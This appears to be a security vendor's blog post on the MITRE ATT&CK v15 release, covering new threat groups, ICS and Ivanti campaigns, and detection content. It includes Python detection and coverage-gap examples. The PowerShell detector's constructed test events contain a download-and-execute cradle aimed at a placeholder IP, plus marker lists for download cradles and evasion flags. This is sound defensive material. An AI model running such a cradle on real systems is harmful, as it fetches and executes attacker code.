MITRE ATT&CK v15, released in April 2024, expands the framework to over 800 software entries, 150+ tracked groups and 30 campaigns. The release begins a shift in detection content away from CAR-style pseudo-code towards real-world query languages such as Splunk Processing Language (SPL), and adds seven new threat actor groups and seven new campaigns, among them three ICS campaigns and the Cutting Edge enterprise campaign against Ivanti Connect Secure VPN appliances.
The table below summarises the key changes between ATT&CK v14 and MITRE ATT&CK v15 at a glance.
| Dimension | ATT&CK v14 | ATT&CK v15 |
|---|---|---|
| Tracked groups | 143 | 150+ (7 new) |
| Campaigns | 23 | 30 (7 new) |
| Software entries | ~780 | 800+ |
| Detection content format | CAR pseudo-code | Real-world query syntax (e.g. Splunk SPL) alongside pseudo-code |
| ICS campaigns | Previously documented | 3 new additions |
| Enterprise campaigns | Previously documented | 1 new (Cutting Edge / Ivanti VPNs) |
What are the headline changes in MITRE ATT&CK v15?
MITRE ATT&CK v15 documents over 800 unique pieces of software, over 150 groups and 30 campaigns. One of the key changes is to the Detections section of technique pages: MITRE are moving away from sharing detection opportunities for Tactics, Techniques and Procedures (TTPs) purely as Cyber Analytics Repository (CAR) style pseudo-code and towards vendor-specific detection queries.
Updated Groups
MITRE have introduced 7 new tracked groups, the most notable being Akira and Mustard Tempest.
Akira is a ransomware-as-a-service (RaaS) operation that emerged in March 2023 and soon added a Linux variant targeting VMware ESXi hypervisors. It rapidly accumulated victims across healthcare, education, professional services and finance. By early 2024 Akira had compromised over 250 organisations and collected approximately $42 million in ransom payments, according to CISA advisory AA24-131A (co-authored with the FBI, Europol EC3 and the Netherlands NCSC-NL). Initial access typically came through VPN services without multi-factor authentication (MFA), most often Cisco VPNs, including by brute force. From there the operators targeted hypervisors and SQL servers and moved from initial access to encryption within days to weeks, a tempo that shrinks the window in which defenders can detect and evict them. Akira is also known for its 1980s-style green-on-black Data Leak Site (DLS) on the dark web.
Mustard Tempest has operated in the ransomware ecosystem since at least 2017 as an Initial Access Broker (IAB), running the long-lived 'SocGholish' malware distribution network, which lures victims with fake browser update prompts on compromised websites. Access brokered by the group has been linked to LockBit deployments, and it is known to deliver remote access tools.
_For a deep dive analysis of initial access malware, read a recent blog post from our Incident Response team on GootLoader malware which is used as initial access malware._
Changes to Industrial Control Systems (ICS)
MITRE also updated the ICS matrix of ATT&CK with new campaigns, techniques and other changes.
ICS Campaigns
Three new ICS campaigns, formally documented in the April 2024 v15 release, illustrate the range of motivations and tradecraft seen in attacks on ICS/Supervisory Control and Data Acquisition (SCADA) systems.
- 2022 Ukraine Electric Power Attack: attributed to Sandworm Team, the actor behind the 2015 and 2016 attacks on the Ukrainian grid. The 2022 intrusion disrupted substations using the GOGETTER tunneller, the Neo-REGEORG web shell and the CaddyWiper wiper.
- Triton Safety Instrumented System Attack: the 2017 intrusion at a petrochemical facility that targeted Schneider Electric Triconex safety controllers. The malware caused a safety trip that shut down the process, which is how the intrusion was discovered.
- Unitronics Defacement Campaign: a series of intrusions across several sectors in late 2023 by CyberAv3ngers, an IRGC-affiliated group newly tracked in v15, which defaced Unitronics Vision Series Programmable Logic Controllers (PLCs). Affected PLCs were found in water and wastewater, energy, food and beverage manufacturing and healthcare.
Which enterprise campaigns were added to MITRE ATT&CK v15?
Cutting Edge (Ivanti Connect Secure VPN Exploitation Campaign)
'Cutting Edge' is MITRE's own designation for this campaign, not an editorial label. It began in December 2023 and targeted Ivanti Connect Secure (formerly Pulse Connect Secure) VPN appliances by chaining two critical vulnerabilities: CVE-2023-46805, an authentication bypass, and CVE-2024-21887, a command injection. The bypass exposed the injection to unauthenticated requests, giving the attackers unauthenticated remote code execution on affected appliances.
The campaign was attributed by Mandiant to UNC5221 and by Volexity to UTA0178, both designations for a suspected China-nexus espionage group. It affected organisations across government, defence and technology in the United States, Europe and Asia-Pacific. CISA and international partners issued joint advisory AA24-060B confirming active exploitation of both CVEs.
Notably, MITRE's own NERVE (Networked Experimentation, Research, and Virtualization Environment) network was compromised via the same Ivanti Connect Secure vulnerabilities, disclosed by MITRE in April 2024. The fact that the organisation responsible for the ATT&CK framework itself fell victim to the campaign underscores the severity of the Ivanti Connect Secure vulnerability exposure.
MITRE also introduced multiple minor changes and updates to existing enterprise campaigns.
How has MITRE changed its detection content in ATT&CK v15?
Previously, MITRE expressed detection opportunities as pseudo-code, typically drawn from a separate MITRE project, the Cyber Analytics Repository (CAR). MITRE recognised that this was hard for defenders to operationalise and have added real-world query syntax such as Splunk Processing Language (SPL). CAR remains a standalone project; the v15 change is that technique pages now carry analytics with a vendor-native query next to the pseudo-code, rather than replacing CAR.
An example can be found in the Detections section of the Command and Scripting Interpreter: PowerShell (T1059.001) technique page.
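To make the pseudo-code versus query-language contrast concrete, here is an added example (not MITRE's analytic and not code from the T1059.001 page) that implements a PowerShell detection in Python over constructed Sysmon-style process-creation events. The pseudo-code and SPL in the docstring are illustrative renderings of the same logic; the Sysmon field names, the marker lists and the sample command lines are assumptions built for this example.

```python
r"""Worked detection for T1059.001 over constructed process-creation events.

ATT&CK-style pseudo-code for the analytic implemented below:
    processes  = search Process:Create
    suspicious = filter processes where (exe == "powershell.exe" and
                 (command_line contains "-enc" or parent in office_or_script_hosts))
Illustrative Splunk SPL for the same idea (field names assume a Sysmon sourcetype):
    index=sysmon EventCode=1 Image="*\\powershell.exe"
      (CommandLine="* -enc*" OR CommandLine="* -EncodedCommand*"
       OR ParentImage="*\\WINWORD.EXE" OR ParentImage="*\\wscript.exe")
The Python goes one step further and decodes -EncodedCommand payloads, so the
analyst sees what the obfuscated command actually does.
"""
import base64
import binascii
import re
from typing import Dict, List, Optional

PS_IMAGE = re.compile(r"\\(?:powershell|pwsh)\.exe$", re.IGNORECASE)
# powershell.exe accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...),
# so every prefix is matched rather than only the full switch name.
_ENC_PREFIXES = ["encodedcommand"[:n] for n in range(1, len("encodedcommand") + 1)]
ENC_FLAG = re.compile(
    r"(?:^|\s)-(?:" + "|".join(_ENC_PREFIXES) + r")\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)
# Download-cradle markers searched in both the plaintext and the decoded command.
CRADLE_MARKERS = ("iex", "invoke-expression", "downloadstring", "net.webclient",
                  "invoke-webrequest", "frombase64string")
# Window-hiding / profile-skipping switches: recorded as context, never an alert on their own.
EVASION_FLAGS = ("-nop", "-noprofile", "-noni", "-noninteractive", "-w hidden",
                 "-windowstyle hidden", "-ep bypass", "-executionpolicy bypass")
# Parents that rarely have a legitimate reason to spawn PowerShell.
SUSPICIOUS_PARENTS = ("winword.exe", "excel.exe", "outlook.exe", "wscript.exe",
                      "cscript.exe", "mshta.exe")

def decode_encoded_command(b64: str) -> Optional[str]:
    """Decode an -EncodedCommand argument (base64 of UTF-16LE text); None if malformed."""
    try:
        return base64.b64decode(b64, validate=True).decode("utf-16-le")
    except (binascii.Error, ValueError):  # UnicodeDecodeError is a ValueError
        return None

def encode_for_powershell(script: str) -> str:
    """Inverse of the above; used here only to build the constructed sample event."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")

def analyze_event(event: Dict[str, str]) -> Optional[Dict[str, object]]:
    """Return a finding for one Sysmon-style event, or None when nothing looks suspicious."""
    image = event.get("Image", "")
    if not PS_IMAGE.search(image):
        return None  # not PowerShell: T1059.001 does not apply
    cmdline = event.get("CommandLine", "")
    parent = event.get("ParentImage", "").rsplit("\\", 1)[-1].lower()
    reasons: List[str] = []
    decoded: Optional[str] = None
    match = ENC_FLAG.search(cmdline)
    if match:
        decoded = decode_encoded_command(match.group(1))
        reasons.append("encoded command" + ("" if decoded else " (payload not decodable)"))
    visible = cmdline.lower() + " " + (decoded or "").lower()
    hits = sorted(m for m in CRADLE_MARKERS if m in visible)
    if hits:
        reasons.append("download cradle markers: " + ", ".join(hits))
    if parent in SUSPICIOUS_PARENTS:
        reasons.append("spawned by " + parent)
    if not reasons:
        return None
    flags = sorted(f for f in EVASION_FLAGS if f in cmdline.lower())
    if flags:
        reasons.append("evasion flags: " + ", ".join(flags))
    return {"image": image, "parent": parent, "command_line": cmdline,
            "decoded": decoded, "reasons": reasons}

def run_detection(events: List[Dict[str, str]]) -> List[Dict[str, object]]:
    """Apply the analytic to a batch of events and keep only the findings."""
    return [f for f in (analyze_event(e) for e in events) if f is not None]

PS_EXE = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
DOWNLOADER = "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/a.ps1')"
# Constructed Sysmon Event ID 1 style events (not captured telemetry; TEST-NET-2 address).
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"Image": PS_EXE, "ParentImage": r"C:\Windows\explorer.exe",            # benign script
     "CommandLine": r"powershell.exe -File C:\scripts\backup.ps1"},
    {"Image": PS_EXE, "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "CommandLine": "powershell.exe -nop -w hidden -enc " + encode_for_powershell(DOWNLOADER)},
    {"Image": r"C:\Windows\System32\cmd.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "cmd.exe /c dir"},                                      # not PowerShell
    {"Image": PS_EXE, "ParentImage": r"C:\Windows\System32\wscript.exe",    # plaintext cradle
     "CommandLine": 'powershell -w hidden -c "' + DOWNLOADER + '"'},
    {"Image": PS_EXE, "ParentImage": r"C:\Windows\explorer.exe",            # corrupt payload
     "CommandLine": "powershell.exe -EncodedCommand AAA"},
]

if __name__ == "__main__":
    for finding in run_detection(SAMPLE_EVENTS):
        print(finding["parent"], "->", "; ".join(finding["reasons"]))
        if finding["decoded"]:
            print("   decoded:", finding["decoded"])
```

Running it produces three findings (the macro-spawned encoded downloader with its decoded command, the plaintext cradle launched by wscript.exe, and the undecodable payload) and stays silent on the scheduled backup script. The decode step is the point: an SPL match on `-enc` tells the analyst that something was encoded, while the decoded text tells them whether it was a download cradle or an administrator's legitimate script.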
How should defenders use MITRE ATT&CK v15 to improve cyber resilience?
Build a threat model that maps your organisation's high-value assets to the threat actors, TTPs and detections documented in MITRE ATT&CK v15. Focus on the groups most relevant to your sector: the three new ICS campaigns matter most to OT/ICS environments, Akira represents elevated risk for organisations without MFA on VPN endpoints, and Mustard Tempest's SocGholish drive-by campaigns threaten any organisation whose users browse the web. For UK enterprise and CNI organisations, mapping your threat model to MITRE ATT&CK v15 provides a structured, internationally recognised framework for intelligence-led defence.
From a Precursor Security analyst perspective, the newly tracked groups and campaigns in v15 pose differentiated risk by sector: Akira has targeted healthcare, education, professional services and finance; the ICS campaigns documented in v15, above all the Sandworm-linked 2022 Ukraine grid attack and the Unitronics PLC defacements, are directly relevant to UK energy and water utilities operating under the NIS Regulations 2018; and Mustard Tempest's SocGholish campaigns are frequently observed in UK corporate environments. Organisations in these sectors should treat v15 as a prompt to validate detection coverage against these groups specifically.
A practical starting point for any defender:
- Open ATT&CK Navigator and create a layer against the v15 enterprise (or ICS) dataset.
- Use the group descriptions in ATT&CK to pick the threat actors most relevant to your sector and geography, then select those groups in Navigator to highlight their techniques.
- Cross-reference each group's listed techniques against your current detection rule set and threat intelligence feeds.
- For any technique lacking a detection, check the analytics in the technique's Detections section; the v15 Splunk SPL examples run directly in Splunk and translate readily to other SIEM query languages.
- Log identified gaps and prioritise by technique prevalence or group activity recency.
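The five steps above can be scripted against the same ATT&CK STIX data that powers Navigator. The following is an added example, not a MITRE tool and not Precursor's own tooling: it maps selected groups to their techniques, compares them against Sigma-style ATT&CK tags on a rule inventory, ranks the gaps by how many groups share each technique, and writes a Navigator layer. The miniature bundle, its G99xx group IDs and group-to-technique links, the rule set and the Navigator version strings are all constructed assumptions.

```python
"""Gap analysis: techniques used by selected ATT&CK groups versus a detection rule inventory.
Real input is the enterprise-attack STIX 2.1 bundle from the mitre-attack/attack-stix-data repository
(json.load it and pass the dict in). SAMPLE_BUNDLE is a constructed miniature with the same object
shapes; its group IDs and group-to-technique links are illustrative, not ATT&CK's actual data."""
import json
from collections import defaultdict
from typing import Dict, Iterable, List, Optional, Set

def attack_id(obj: dict) -> Optional[str]:
    """ATT&CK ID (G1234, T1059.001, ...) from the object's mitre-attack external reference."""
    for ref in obj.get("external_references", []):
        if ref.get("source_name") == "mitre-attack" and ref.get("external_id"):
            return ref["external_id"]
    return None

def is_active(obj: dict) -> bool:
    """The bundle keeps revoked and deprecated objects; they must not count towards anything."""
    return not obj.get("revoked", False) and not obj.get("x_mitre_deprecated", False)

def techniques_by_group(bundle: dict, group_names: Iterable[str]) -> Dict[str, Set[str]]:
    """Map each selected group name to the technique IDs linked to it by 'uses' relationships."""
    wanted, objs = set(group_names), bundle["objects"]
    groups = {o["id"]: o["name"] for o in objs
              if o["type"] == "intrusion-set" and is_active(o) and o["name"] in wanted}
    techs = {o["id"]: attack_id(o) for o in objs
             if o["type"] == "attack-pattern" and is_active(o) and attack_id(o)}
    result: Dict[str, Set[str]] = {name: set() for name in groups.values()}
    for rel in objs:
        if (rel["type"] == "relationship" and rel.get("relationship_type") == "uses"
                and is_active(rel) and rel["source_ref"] in groups and rel["target_ref"] in techs):
            result[groups[rel["source_ref"]]].add(techs[rel["target_ref"]])
    return result

def covered_techniques(rules: Iterable[dict]) -> Set[str]:
    """Technique IDs from Sigma-style tags ('attack.t1059.001'). Exact IDs only: a rule
    tagged with a parent technique does not automatically cover its sub-techniques."""
    covered: Set[str] = set()
    for rule in rules:
        for tag in rule.get("tags", []):
            if tag.lower().startswith("attack.t"):
                covered.add(tag.split(".", 1)[1].upper())
    return covered

def coverage_gaps(group_techs: Dict[str, Set[str]], covered: Set[str]) -> List[dict]:
    """Uncovered techniques, ordered by how many selected groups use them, then by ID."""
    users: Dict[str, Set[str]] = defaultdict(set)
    for group, techs in group_techs.items():
        for tech in techs:
            users[tech].add(group)
    gaps = [{"technique": t, "groups": sorted(g), "score": len(g)}
            for t, g in users.items() if t not in covered]
    return sorted(gaps, key=lambda gap: (-gap["score"], gap["technique"]))

def navigator_layer(group_techs: Dict[str, Set[str]], covered: Set[str],
                    name: str = "v15 coverage review") -> dict:
    """ATT&CK Navigator layer colouring covered (green) and uncovered (red) techniques."""
    layer = {"name": name, "domain": "enterprise-attack", "techniques": [],
             "versions": {"attack": "15", "navigator": "4.9.1", "layer": "4.5"}}  # assumed versions
    for tech in sorted(set().union(*group_techs.values())):
        hit = tech in covered
        layer["techniques"].append({"techniqueID": tech, "score": 0 if hit else 1,
                                    "color": "#8ec843" if hit else "#ff6666",
                                    "comment": "covered" if hit else "GAP: no detection rule"})
    return layer

def _obj(kind, uid, ext_id, **fields):  # constructed STIX-shaped object for the sample bundle
    return {"type": kind, "id": f"{kind}--{uid}", **fields,
            "external_references": [{"source_name": "mitre-attack", "external_id": ext_id}]}

def _uses(src, dst, **extra):
    return {"type": "relationship", "id": f"relationship--{src}-{dst}", "relationship_type": "uses",
            "source_ref": f"intrusion-set--{src}", "target_ref": f"attack-pattern--{dst}", **extra}

SAMPLE_BUNDLE = {"type": "bundle", "id": "bundle--constructed", "objects": [
    _obj("intrusion-set", "akira", "G9901", name="Akira"),
    _obj("intrusion-set", "mustard", "G9902", name="Mustard Tempest"),
    _obj("attack-pattern", "t1133", "T1133", name="External Remote Services"),
    _obj("attack-pattern", "t1110", "T1110", name="Brute Force"),
    _obj("attack-pattern", "t1486", "T1486", name="Data Encrypted for Impact"),
    _obj("attack-pattern", "t1189", "T1189", name="Drive-by Compromise"),
    _obj("attack-pattern", "t1105", "T1105", name="Ingress Tool Transfer"),
    _obj("attack-pattern", "t1059001", "T1059.001", name="PowerShell", x_mitre_is_subtechnique=True),
    _obj("attack-pattern", "old", "T9999", name="Retired Technique", revoked=True),
    _uses("akira", "t1133"), _uses("akira", "t1110"), _uses("akira", "t1486"),
    _uses("akira", "t1059001"), _uses("akira", "t1105"),
    _uses("akira", "old"),                  # target technique is revoked: ignored
    _uses("akira", "t1189", revoked=True),  # relationship itself is revoked: ignored
    _uses("mustard", "t1189"), _uses("mustard", "t1105"), _uses("mustard", "t1059001"),
]}
DETECTION_RULES = [  # constructed rule inventory carrying Sigma-style ATT&CK tags
    {"title": "Encoded PowerShell command line", "tags": ["attack.execution", "attack.t1059.001"]},
    {"title": "Mass rename to ransomware extension", "tags": ["attack.impact", "attack.t1486"]},
    {"title": "Legacy alert without ATT&CK mapping", "tags": []},
]
if __name__ == "__main__":
    mapping = techniques_by_group(SAMPLE_BUNDLE, ["Akira", "Mustard Tempest"])
    covered = covered_techniques(DETECTION_RULES)
    for gap in coverage_gaps(mapping, covered):
        print(f"{gap['technique']:<10} {gap['score']} group(s): {', '.join(gap['groups'])}")
    print(json.dumps(navigator_layer(mapping, covered), indent=2))
```

Pointed at the real enterprise-attack.json, the same functions produce the actual v15 mapping, and the JSON written by navigator_layer loads into Navigator as an existing layer. Two design choices matter in practice: revoked or deprecated objects and relationships are dropped so that retired techniques never inflate coverage, and rule tags must name the exact technique, since a rule mapped to a parent such as T1059 says nothing about whether its PowerShell sub-technique is actually detected.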
The Precursor SOC maps all alerting to MITRE ATT&CK and updates detection coverage with each new framework release, including v15. If you would like an assessment of your current detection coverage against the groups and techniques introduced in v15, contact the Precursor SOC team.
Frequently Asked Questions
What changed in MITRE ATT&CK v15?
MITRE ATT&CK v15, released in April 2024, added 7 new threat actor groups (including Akira and Mustard Tempest) and 7 new campaigns, among them three ICS campaigns and the Cutting Edge enterprise campaign, and expanded the software library to over 800 entries. The most significant change to the framework's content was the addition of real-world detection query syntax, such as Splunk Processing Language (SPL), alongside pseudo-code on technique pages.
What is the Cutting Edge campaign in MITRE ATT&CK v15?
Cutting Edge is MITRE's official designation for the December 2023 campaign that exploited Ivanti Connect Secure VPN appliances using CVE-2023-46805 and CVE-2024-21887. It was attributed to a suspected China-nexus group (UNC5221/UTA0178) and affected government, defence, and technology organisations across the US, Europe, and Asia-Pacific. MITRE's own NERVE research network was compromised in the same campaign, disclosed in April 2024.
How many groups does MITRE ATT&CK v15 track?
MITRE ATT&CK v15 tracks over 150 groups, up from 143 in v14. The 7 new groups include Akira, Mustard Tempest and CyberAv3ngers.
How does MITRE ATT&CK v15 change detection engineering?
In v15, MITRE began pairing the pseudo-code detection analytics on technique pages with vendor-specific query syntax, starting with Splunk SPL examples. Defenders can take these queries as a starting point, which reduces the translation effort needed to operationalise a detection in a real SIEM environment.
How should a SOC team use MITRE ATT&CK v15?
SOC teams should create a v15 layer in ATT&CK Navigator, select the threat actor groups most relevant to their sector and cross-reference those groups' techniques against existing detection rules. Any gap, a technique with no corresponding detection, is a prioritised candidate for new rule development. The vendor-specific detection examples introduced in v15 provide working SPL queries as a starting point for each gap, usable directly in Splunk and translatable to other SIEMs.